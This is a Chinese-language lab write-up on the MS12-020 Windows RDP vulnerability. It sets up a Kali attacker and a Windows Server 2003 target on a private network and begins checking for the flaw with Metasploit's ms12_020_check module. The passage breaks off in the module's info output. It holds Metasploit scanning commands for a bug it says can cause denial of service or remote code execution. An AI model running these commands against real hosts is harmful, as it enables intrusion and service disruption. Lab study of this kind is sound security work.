前言
攻击者向受影响的系统发送一系列特制 RDP 数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP,默认端口3389)。没有启用 RDP 的系统不受威胁。此实验对目标系统造成了DOS攻击。
0x01 实验环境
攻击机:kali linux
ip:192.168.8.130
目标机:windows server 2003 Enterprise x64 SP2
ip:192.168.8.129
0x02 漏洞验证
使用msf的模块:auxiliary/scanner/rdp/ms12_020_check验证目标机是否具有此漏洞
msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129
msf auxiliary(ms12_020_check) > info
Name: MS12-020 Microsoft Remote Desktop Checker
Module: auxiliary/scanner/rdp/ms12_020_check
License: Metasploit Framework License (BSD)
R